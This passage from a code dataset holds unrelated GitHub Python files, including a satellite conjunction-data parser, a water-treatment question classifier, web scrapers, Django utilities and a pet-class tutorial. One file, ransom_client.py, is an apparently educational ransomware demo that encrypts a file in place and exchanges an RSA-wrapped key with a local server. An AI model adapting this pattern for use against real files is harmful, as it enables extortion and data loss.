\")[1].strip().split(\" \")\n self.ref_frame = [x for x in line if x]\n # print(ref_frame)\n line = lines[30].split(\" : \")[1].strip().split(\" \")\n self.gravity_model = [x for x in line if x]\n # print(gravity_model)\n line = lines[31].split(\": \")[1].strip().split(\" \")\n self.atmospheric_model = [x for x in line if x]\n # print(atmospheric_model)\n line = lines[32].split(\": \")[1].strip().split(\" \")\n self.n_body_perturbations = [x for x in line if x]\n # print(n_body_perturbations)\n line = lines[33].split(\": \")[1].strip().split(\" \")\n self.solar_rad_pressure = [x for x in line if x]\n # print(solar_rad_pressure)\n line = lines[34].split(\": \")[1].strip().split(\" \")\n self.earth_tides = [x for x in line if x]\n # print(earth_tides)\n line = lines[35].split(\": \")[1].strip().split(\" \")\n self.intrack_thrust = [x for x in line if x]\n # print(intrack_thrust)\n line = lines[36].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_sta = []\n self.time_lastob_sta.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_sta.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_sta)\n line = lines[37].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_end = []\n self.time_lastob_end.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_end.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_end)\n line = lines[38].split(\": \")[1].strip().split(\" \")\n self.rec_od_span = [float(x) for x in line if x]\n # print(rec_od_span)\n line = lines[39].split(\": \")[1].strip().split(\" \")\n self.actual_od_span = [float(x) for x in line if x]\n # print(actual_od_span)\n line = lines[40].split(\": \")[1].strip().split(\" \")\n self.obs_available = [float(x) for x in line if x]\n # print(obs_available)\n line = lines[41].split(\": \")[1].strip().split(\" \")\n self.obs_used = [float(x) for x in line if x]\n # print(obs_used)\n line = lines[42].split(\": \")[1].strip().split(\" \")\n self.residuals_accepted = [float(x) for x in line if x]\n # print(residuals_accepted)\n line = lines[43].split(\": \")[1].strip().split(\" \")\n self.weighted_rms = [float(x) for x in line if x]\n # print(weighted_rms)\n line = lines[44].split(\": \")[1].strip().split(\" \")\n self.area_pc = [float(x) for x in line if x]\n # print(area_pc)\n line = lines[45].split(\": \")[1].strip().split(\" \")\n self.area_drag = [float(x) for x in line if x]\n # print(area_drag)\n line = lines[46].split(\": \")[1].strip().split(\" \")\n self.area_srp = [float(x) for x in line if x]\n # print(area_srp)\n line = lines[47].split(\": \")[1].strip().split(\" \")\n self.mass = [float(x) for x in line if x]\n # print(mass)\n line = lines[48].split(\": \")[1].strip().split(\" \")\n self.cd_am = [float(x) for x in line if x]\n # print(cd_am)\n line = lines[49].split(\": \")[1].strip().split(\" \")\n self.cr_am = [float(x) for x in line if x]\n # print(cr_am)\n line = lines[50].split(\": \")[1].strip().split(\" \")\n self.thrust_acc = [float(x) for x in line if x]\n # print(thrust_acc)\n line = lines[51].split(\": \")[1].strip().split(\" \")\n self.sedr = [float(x) for x in line if x]\n # print(sedr)\n line = lines[52].split(\": \")[1].strip().split(\" \")\n X = [float(x) for x in line if x]\n # print(X)\n line = lines[53].split(\": \")[1].strip().split(\" \")\n Y = [float(x) for x in line if x]\n # print(Y)\n line = lines[54].split(\": \")[1].strip().split(\" \")\n Z = [float(x) for x in line if x]\n # print(Z)\n self.position_XYZ = np.array([X,Y,Z])\n line = lines[55].split(\": \")[1].strip().split(\" \")\n X_dot = [float(x) for x in line if x]\n # print(X_dot)\n line = lines[56].split(\": \")[1].strip().split(\" \")\n Y_dot = [float(x) for x in line if x]\n # print(Y_dot)\n line = lines[57].split(\": \")[1].strip().split(\" \")\n Z_dot = [float(x) for x in line if x]\n # print(Z_dot)\n self.position_dot_XYZ = np.array([X_dot,Y_dot,Z_dot])\n\n line = lines[59].split(\": \")[1].strip().split(\" \")\n self.apogee = [float(x) for x in line if x]\n # print(apogee)\n line = lines[60].split(\": \")[1].strip().split(\" \")\n self.perigee = [float(x) for x in line if x]\n # print(perigee)\n line = lines[61].split(\": \")[1].strip().split(\" \")\n self.eccentricity = [float(x) for x in line if x]\n # print(eccentricity)\n line = lines[62].split(\": \")[1].strip().split(\" \")\n self.inclination = [float(x) for x in line if x]\n # print(inclination)\n\n line = lines[64].split(\": \")[1].strip().split()\n self.RTN_1sigma = [float(x) for x in line if x]\n # print(RTN_1sigma)\n\n line = lines[66].split(\": \")[1].strip().split()\n RTN_covariance_temp = [float(x) for x in line if x]\n line = lines[67].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n line = lines[68].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n self.RTN_covariance = np.zeros((3,3,2))\n self.RTN_covariance[:,:,0] = np.array([ [RTN_covariance_temp[0],RTN_covariance_temp[2][0],RTN_covariance_temp[3][0]],\n [RTN_covariance_temp[2][0],RTN_covariance_temp[2][1],RTN_covariance_temp[3][1]],\n [RTN_covariance_temp[3][0],RTN_covariance_temp[3][1],RTN_covariance_temp[3][2] ] ])\n self.RTN_covariance[:,:,1] = np.array([ [RTN_covariance_temp[1],RTN_covariance_temp[2][2],RTN_covariance_temp[3][3]],\n [RTN_covariance_temp[2][2],RTN_covariance_temp[2][3],RTN_covariance_temp[3][4]],\n [RTN_covariance_temp[3][3],RTN_covariance_temp[3][4],RTN_covariance_temp[3][5] ] ] )\n","repo_name":"fabrizioturco/CAM_aerodynamic_drag","sub_path":"collisionAvoidanceAnalysis/conjunction_data_message.py","file_name":"conjunction_data_message.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8116048695","text":"#-*- coding : utf-8 -*-\n# coding: utf-8\n\n\nimport os\nimport ahocorasick\n\nclass QuestionClassifier:\n def __init__(self):\n cur_dir = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n # 特征词路径\n self.project_path = os.path.join(cur_dir, 'dict/project.txt')\n self.unit_path = os.path.join(cur_dir, 'dict/unit.txt')\n self.deny_path = os.path.join(cur_dir, 'dict/deny.txt')\n\n # 加载特征词\n self.project_wds= [i.strip() for i in open(self.project_path) if i.strip()]#encoding=\"utf-8\"\n self.unit_wds= [i.strip() for i in open(self.unit_path) if i.strip()]\n\n self.region_words = set(self.project_wds + self.unit_wds)\n # deny是一个反义词的合集,单独由人工列出\n self.deny_words = [i.strip() for i in open(self.deny_path,encoding=\"utf-8\") if i.strip()]\n # 构造领域actree,ac多模式匹配算法里的方法\n self.region_tree = self.build_actree(list(self.region_words))\n # 构建关键词与对应类型的词典\n self.wdtype_dict = self.build_wdtype_dict() #格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n\n\n\n # 工艺参数单位词,人工列出\n self.Qunit_qwds = ['吨/天', '吨每天', 'CMD', 't/d', 'tph', 't/h', 'm3/h', '吨每小时']\n self.Recovunit_qwds = ['%']\n self.CODunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.CIunit_qwds = ['Us', 'us', 'us/cm', 'ms', 'Ms', 'ms/cm']\n self.Hardunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.SSunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n\n\n\n\n # 问句疑问词,人工列出\n self.process_qwds = ['哪些工艺单元','工艺单元有哪些','什么工艺', '什么流程', '什么工艺流程','哪些工艺','工艺有哪些', '哪些流程', '哪些工艺流程','哪种工艺', '哪种流程', '哪种工艺流程','工艺是什么','工艺流程是什么']\n self.project_qwds = ['什么项目', '什么工程', '哪个项目', '哪个工程','项目有哪些','有哪些项目']\n self.unit_qwds = ['什么设备', '什么单元', '哪个设备', '哪个单元']\n\n\n\n\n\n\n print('model init finished ......') #以上是输入问答模型的基础数据\n\n return\n\n '''分类主函数'''\n def classify(self, question):\n data = {}\n project_dict = self.check_project(question) #check_project:用wdtype_dict进行问句过滤,最终构建成一个符合问句的关键词和关键词类型的字典\n if not project_dict:\n return {}\n data['args'] = project_dict # 将关键词和关键词类型的字典输入一个更大的字典data,这里面存储了问题中提到了哪些节点\n #收集问句当中所涉及到的实体类型\n types = []\n for type_ in project_dict.values(): # 将关键词类型的存储为type\n types += type_\n question_type = 'others'\n\n question_types = []\n\n ## 目标解决以下问题\n # 1 知道项目名称查工艺\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 3 知道进出水的水量、水质、回收率的一个或几个参数查工艺\n # 4 知道某个单元的进水或出水工艺参数名称查项目名称\n # 5 查询某个单元的最高、最低、平均进水或出水工艺参数(附加)\n # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n\n # 1 知道项目名称查工艺\n # 如果问句中包含流程查询且明确的项目名称在查询语句中,如:\n # 蒙西污水处理厂的工艺是什么……日铭三期回用水用了哪些工艺……泰州可利放流回用水包含哪些工艺\n if self.check_words(self.process_qwds, question) and ('project' in types):\n question_type = 'project_unit'\n question_types.append(question_type)\n\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 如果问句中包含项目查询且明确的某个单元名称在查询语句中,如:\n # 用了一级二段反渗透的项目有哪些……用自清洗过滤器的有哪些项目……什么项目用了浸没式超滤\n if self.check_words(self.project_qwds, question) and ('unit' in types):\n question_type = 'unit_project'\n question_types.append(question_type)\n\n # # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n # if self.check_words(self.project_qwds, question) and ('unit' in types):\n # question_type = 'wquality_process'\n # question_types.append(question_type)\n #\n\n # 将多个分类结果进行合并处理,组装成一个字典\n data['question_types'] = question_types\n\n\n return data\n\n '''筛选出构造词对应的类型,也就是够造'args'后面的内容'''\n def build_wdtype_dict(self):\n wd_dict = dict()\n for wd in self.region_words:\n wd_dict[wd] = []\n if wd in self.project_wds:\n wd_dict[wd].append('project')\n if wd in self.unit_wds:\n wd_dict[wd].append('unit')\n\n return wd_dict\n #wd_dict格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n ## 格式或为{}\n\n '''构造actree,加速过滤'''\n def build_actree(self, wordlist):\n actree = ahocorasick.Automaton()\n for index, word in enumerate(wordlist):\n actree.add_word(word, (index, word))\n actree.make_automaton()\n return actree\n\n '''问句过滤从wdtype_dict中过滤出符合question的关键词和关键词类型的字典'''\n def check_project(self, question):\n region_wds = []\n for i in self.region_tree.iter(question):\n wd = i[1][1]\n region_wds.append(wd)\n stop_wds = []\n for wd1 in region_wds:\n for wd2 in region_wds:\n if wd1 in wd2 and wd1 != wd2:\n stop_wds.append(wd1)\n final_wds = [i for i in region_wds if i not in stop_wds]\n final_dict = {i:self.wdtype_dict.get(i) for i in final_wds}\n\n return final_dict\n\n '''基于特征词进行分类'''\n def check_words(self, wds, sent):\n for wd in wds:\n if wd in sent:\n return True\n return False\n\n\nif __name__ == '__main__':\n handler = QuestionClassifier()\n while 1:\n question = input('input an question:')\n data = handler.classify(question)\n print(data)","repo_name":"cooperck/QA_ReuseWater_KG","sub_path":"ruw_question_classifier.py","file_name":"ruw_question_classifier.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1170301963","text":"import telegram\n\nprint(\"provide token\")\ntoken = input()\nprint(\"provide webhook url (or no to use existing)\")\nurl = input()\n\nbot = telegram.Bot(token=token)\n\nif url == \"no\":\n url = bot.get_webhook_info()['url']\n\n\nbot.set_webhook(url, allowed_updates=[\"new_chat_members\"]) and print(\"Successfully updated\")\n","repo_name":"MehmetErkcn/VenusWelcomeBot","sub_path":"external_utilities/set_webhook.py","file_name":"set_webhook.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"22026374950","text":"from django.db.models import Count\n\nfrom .models import *\n\nmenu = [{'title': \"О нас\", 'url_name': 'about'},\n {'title': \"Обратная связь\", 'url_name': 'contact'},\n {'title': \"Добавить услугу\", 'url_name': 'add_page'},\n ]\n\n\nclass DataMixin:\n paginate_by = 10\n\n def get_user_context(self, **kwargs):\n context = kwargs\n cats = Category.objects.annotate(Count('service'))\n\n user_menu = menu.copy()\n if not self.request.user.is_superuser:\n user_menu.pop(2)\n\n context['menu'] = user_menu\n\n context['cats'] = cats # tag для html\n if 'cat_selected' not in context:\n context['cat_selected'] = 0\n return context\n","repo_name":"VDK45/AvtoAvtoStandart","sub_path":"avtosite/avto_tochka/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32539290422","text":"# Cryptography imports for encrypting the keys\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding, rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.fernet import Fernet\n\n# Socket import for using TCP/IP to connect to the server\nimport socket\n\n\"\"\"\nThis file is used to encrypt a file using a symmetric key. The symmetric key is encrypted using the public key of the recipient.\nThe encrypted key is then saved to a file. That key is then used to encrypt a file.\n\"\"\"\n\n# Using Fetnet to generate a token for the key\nsymmetricKey = Fernet.generate_key()\nFernetInstance = Fernet(symmetricKey)\n\n# Opening the public_key to load into memory\nwith open(\"./keys/public_key.key\", \"rb\") as key_file:\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n# Creating an encryptedSymmetricKey with the public_key for encryption\n# using SHA256\nencryptedSymmetricKey = public_key.encrypt(\n symmetricKey,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n)\n\n# Opening or creating the encrypted key file and writing the encryption to\n# it, reading the Fernet Instance and writing the data\nwith open(\"./keys/encryptedSymmertricKey.key\", \"wb\") as key_file:\n key_file.write(encryptedSymmetricKey)\n filePath = \"./ransomware/SecretTextFile.txt\"\n\n with open(filePath, \"rb\") as file:\n file_data = file.read()\n print(file_data)\n encrypted_data = FernetInstance.encrypt(file_data)\n\n with open(filePath, \"wb\") as file:\n file.write(encrypted_data)\n\n\ndef decryptFile(filePath, key):\n FernetInstance = Fernet(key)\n with open(filePath, \"rb\") as d_file:\n file_data = d_file.read()\n decrypted_data = FernetInstance.decrypt(file_data)\n\n with open(\"./ransomware/decryptedTextFile.txt\", \"wb\") as file:\n file.write(decrypted_data)\n\n\ndef sendEncryptedKey(eKeyFilePath):\n with socket.create_connection((\"127.0.0.1\", 8000)) as sock:\n with open(eKeyFilePath, \"rb\") as file:\n file_data = file.read()\n sock.send(file_data)\n decryptedSymmetricKey = sock.recv(1024).strip()\n decryptFile(\"./ransomware/SecretTextFile.txt\",\n decryptedSymmetricKey)\n\n\nsendEncryptedKey(\"./keys/encryptedSymmertricKey.key\")\nquit()\n","repo_name":"LemonSauc3/A1","sub_path":"ransom_client.py","file_name":"ransom_client.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25669662633","text":"import turtle as tr\r\ntr.shape('turtle')\r\nfrom random import *\r\ntr.speed(0)\r\n\r\ndef sluchaino():\r\n while True:\r\n tr.forward(randint(1, 30))\r\n a = random()\r\n if a >= 0.5:\r\n tr.right(randint(30, 360))\r\n else:\r\n tr.left(randint(30, 360))\r\n\r\n\r\nsluchaino()\r\ntr.exitonclick() ","repo_name":"petersNikolA/turtle2","sub_path":"turtle2,1.py","file_name":"turtle2,1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37909418182","text":"from bs4 import BeautifulSoup\nimport urllib.request as urllib2\nfor offset in range(0, 10, 10):\n redditFile = urllib2.urlopen(\n \"https://www.indeed.com/jobs?q=sql&l=United+States&sort=date&radius=25&start=\"+str(offset))\n redditHtml = redditFile.read()\n redditFile.close()\n\n soup = BeautifulSoup(redditHtml, 'html.parser')\n # print(soup)\n jobs = soup.find_all(\"div\", {\"class\": \"jobsearch-SerpJobCard\"})\n\n # print(jobs)\n\n #Title = soup.find_all(\"a\", {\"class\": \"jobtitle turnstileLink\",\"data-tn-element\": \"jobTitle\"})\n #Company = soup.find_all(\"a\", {\"data-tn-element\": \"companyName\"})\n for job in jobs:\n try:\n key = ['title', 'company', 'star', 'date']\n value = [job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"a\", {\"data-tn-element\": \"companyName\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip()]\n # Create a zip object from two lists\n dicobj = zip(key, value)\n # Create a dictionary from zip object\n dictOfWords = dict(dicobj)\n print(dictOfWords)\n except:\n try:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n except:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n","repo_name":"SudharsanaViswanathan/python","sub_path":"WebScrapingIndeedJobs/test_scripts/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22553262662","text":"import os, sys\nimport pandas as pd\nimport shutil\nfrom tqdm import tqdm\n\n# 파일에 원하는 정보를 데이터프레임으로 만들기\ndef make_df(dir):\n file_info = []\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.jpg':\n file_path = os.path.join(root, file)\n filename_split = filename.split('_')\n category = '_'.join(filename_split[:4])\n file_idx = int(filename_split[-1])\n file_info.append([file_path, category, file_idx])\n df = pd.DataFrame(file_info, columns=['filepath', 'category', 'num'])\n\n return df\n\n# 조건에 맞는 파일 추출\ndef file_extract(df, old_df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n old_df = old_df[old_df['category'] == Category]\n\n for i in range(minidx, maxidx, 3):\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n extract_num1 = extract_num + 10\n extract_num2 = extract_num + 20\n # copyfile(df, extract_num)\n old_file = old_df.loc[old_df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n copyfile(df, extract_num1)\n copyfile(df, extract_num2)\n\n\n# 파일 복사\ndef copyfile(df, num):\n extract_file = df.loc[df['num'] == num, 'filepath']\n extract_file = extract_file.values[0]\n root, file = os.path.split(extract_file)\n folder_name = '_'.join(file.split('_')[:3])\n folder = os.path.join(output_dir, 'new_db', folder_name)\n output_path = os.path.join(folder, file)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(extract_file, output_path)\n\n \ndef old_file_extract(df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n for i in range(minidx, maxidx, 3):\n old_file = df.loc[df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n old_file = old_file.values[0]\n root, file = os.path.split(old_file)\n folder_name = '_'.join(file.split('_')[:3])\n filename = '_'.join(file.split('_')[:4])\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n num = str(extract_num).zfill(8)\n frame_filename = f'{filename}_{num}.jpg'\n folder = os.path.join(output_dir, 'old_db', folder_name)\n output_path = os.path.join(folder, frame_filename)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(old_file, output_path)\n \n_, old_db_dir, new_db_dir, output_dir, mode_num = sys.argv\n\nold_db_df = make_df(old_db_dir)\nnew_db_df = make_df(new_db_dir)\n\ncategory_list = old_db_df['category'].unique()\n\n# 맨 앞 프레임을 무조건 살리는 경우\nif mode_num == '0':\n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n \n# 맨 앞 프레임에 조건을 넣을 경우\nelif mode_num == '1': \n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n min_idx = min_idx + 2\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n min_idx = min_idx + 1\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)","repo_name":"tkdalsrb123/Alchera","sub_path":"08/0801_frame_match_extract/frame_match_extract.py","file_name":"frame_match_extract.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11423635038","text":"import numpy as np\nimport pandas as pd\nimport yfinance as yf\nimport json as js\n\n# Function to pull option information of a stock\ndef option_pull(sym):\n ticker = yf.Ticker(sym)\n list_of_expirations = ticker.options\n\n # dataframe for options\n options = pd.DataFrame()\n\n for entry in list_of_expirations:\n curr_option = ticker.option_chain(entry)\n aggr_option = pd.DataFrame().append(curr_option.calls).append(curr_option.puts)\n aggr_option['expirationDate'] = entry\n options = options.append(aggr_option, ignore_index=True)\n\n return options\n\nprint (option_pull(\"AMD\"))\n\n\n\n\n\n","repo_name":"Anthony3301/Options-Evalutation-Tool","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12599076265","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # 商品购买\n url(r'^product/$', views.product, name=\"product\"),\n url(r'^add/$',views.add,name=\"add\"),\n url(r'^findTypeByPID/$',views.findTypeByPID,name=\"findTypeByPID\"),\n # 购买\n url(r'(?P\\d+)/product/$', views.product, name=\"product\"),\n # 评论\n url(r'(?P\\d+)/pinglun/$', views.pinglun, name=\"pinglun\"),\n # 详情\n url(r'(?P\\d+)/xiangqing/$', views.xiangqing, name=\"xiangqing\"),\n # 分类\n url(r'(?P\\d+)/fenlei/$', views.fenlei, name=\"fenlei\"),\n]","repo_name":"0912TAO/mall1","sub_path":"goods/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34641998815","text":"class Person:\n def __init__(self, name, money, mood, healthRate):\n self.name = name\n self.money = money\n self.mood = mood\n self.healthRate = healthRate\n\n def eat(self, meals):\n meals = int(meals)\n if meals == 3:\n return \"100% hth\"\n elif meals == 2:\n return \"75% hth\"\n elif meals == 1:\n return \"50% hth\"\n elif meals == 0:\n return \"0% hth\"\n elif meals > 3:\n return \"fat\"\n else:\n return \"wrong input\"\n\n def sleep(self, hours):\n hours = int(hours)\n if hours == 7:\n return \"Happy\"\n elif hours < 7:\n return \"tired\"\n else:\n return \"Lazy\"\n\n def buy(self, items):\n items = int(items)\n self.money += items * 10\n return self.money\n\n @property # print property value\n def healthRate(self):\n return self.__healthRate\n\n @healthRate.setter\n def healthRate(self, helth):\n if helth >= 0 and helth <= 100:\n self.__healthRate = helth\n else:\n print(\"must be between 0 to 100.\")\n","repo_name":"minaemad13/Python_ITI_Lab4","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15954356355","text":"#\"我的魔幻宠物\"\n#目的:通过编程创建和自己互动的虚拟宠物,学习类的一些基本概念和用法\n'''现在请发挥你的想象力,把自己想象成一位宠物店的小魔法师,\n 现在你的工作是创造一些讨客人喜欢的魔幻宠物\n 可以是 传说中美丽的独角兽,那一定会让没见过独角兽的客人大吃一惊\n 但在这之前,我们需要学习一些魔法咒语(代码)\n'''\n#1.定义类\n'''首先,包括独角兽在内的所有魔幻宠物都需要先有个模型\n ,然后才能在这个模型的基础上去发挥想象力补充这个模型的具体细节\n 所以这个模型的创建,即类的定义,是十分很重要的\n 在这个过程中,我们需要使用第一条咒语\"class\",然后加上这个类的名称'''\nclass MyMagicPet:\n #2.定义属性\n '''\n 在类的下面给出魔幻宠物的基本属性:可以思考一下你要创建的一大群的宠物\n 会有的共同的特点,都会有名字,年龄等等,这里的答案很多,可以按照你的喜好\n 把它补充得更完整\n '''\n name = \"\"#名字\n age = 0#年龄\n gender = \"\"#性别\n color = \"\"#颜色\n #3.定义方法\n '''\n 接下来我们可以用”函数咒语“来实现我们想要对宠物进行的操作\n 比如选择他们的属性(例如:给他们取名,决定他们的性别),\n 还可以给它们喂食,跟他们玩耍等等'''\n def __init__(self, name, age, gender, color):\n '''\n 这个函数咒语可帮助我们定义一些创造出来的小动物可以改变的属性\n 这个过程也称为初始化(要记得写self)\n '''\n self.name = name\n self.age = age\n self.gender = gender\n self.color = color\n self.physicalCondition = \"健康的\"\n self.mentalCondition = \"快乐的\"\n self.degree = 0\n self.container = 0\n def show_info(self):\n print(f\"{self.name}的年龄是{self.age}岁,性别是{self.gender},颜色是{self.color}\")\n print(f\"状态是{self.physicalCondition}和{self.mentalCondition},等级是{self.degree}\")\n def feed_pet(self):\n '''\n 这是一个喂宠物的函数咒语,\n 根据宠物的健康状态进行不同的操作,\n 喂食成功会改变宠物的状态并升级宠物,\n 喂食失败则输出失败信息\n '''\n if self.physicalCondition == \"健康的\":\n print(\"喂食成功,你的宠物打了一个很响的饱嗝\")\n self.physicalCondition = \"饱食的\"\n self.upgrade_pet()\n elif self.physicalCondition == \"饥饿的\":\n print(\"喂食成功,你的宠物蹭着你的腿表示感谢\")\n self.physicalCondition = \"健康的\"\n self.upgrade_pet()\n else:\n print(\"喂食失败\")\n print(f\"{self.name}现在状态是{self.physicalCondition}\")\n print(\"无法继续获取经验,需要玩耍\")\n if self.mentalCondition == \"疲劳的\":\n self.mentalCondition = \"快乐的\"\n print(f\"{self.name}现在状态是{self.physicalCondition}和{self.mentalCondition}\")\n def play_with_pet(self):\n '''\n 这个函数咒语根据宠物的身心状态决定是否可以和宠物玩耍,\n 并根据结果更新宠物的状态信息。\n\n '''\n if self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"快乐的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"兴奋的\"\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n self.upgrade_pet()\n elif self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"兴奋的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"疲劳的\"\n self.physicalCondition = \"饥饿的\"\n self.upgrade_pet()\n else:\n print(\"跟他们玩耍失败\")\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n print(\"无法继续获取经验,需要喂食\")\n print(f\"{self.name}现在的状态是{self.physicalCondition}和{self.mentalCondition}\")\n def roll_over(self):\n '''这是一个简单的让宠物执行翻滚动作的函数咒语'''\n if self.degree >= 2:\n print(\"宠物翻滚成功\")\n self.upgrade_pet()\n else:\n print(\"宠物翻滚失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到2级才能翻滚\")\n def upgrade_pet(self):\n '''这个函数咒语可就厉害了,它能实现我们在游戏中经常看到的角色升级功能\n 那它的操作思路是怎么样的呢\n 1,首先,得用到上面初始化的存储经验的容器self.container\n 在执行一次可以加经验的行为的时候,容器里的经验值加1,\n 2.然后我们给这个容器一个上限:5\n 然后用if咒语来判断容器在加经验后是否满了\n 要是满了,就升一级,同时把容器里的经验清零,\n 然后就能实现这个升级功能啦'''\n self.container = self.container + 1\n print(f\"宠物{self.name}经验值加一,离升下一级还差{5 - self.container}点经验值\")\n if self.container == 5:\n self.degree = self.degree + 1\n print(f\"恭喜你的宠物{self.name}成功升到{self.degree}级\")\n self.container = 0\n\n'''\n class咒语还有另一种作用,叫做\"继承\",就是传承基本的宠物类的各种属性及方法(也就是函数)\n 在继承的过程中,你也可以根据你所希望对宠物进行的操作来进行属性和方法的修改或增加'''\n\nclass Dragon(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n 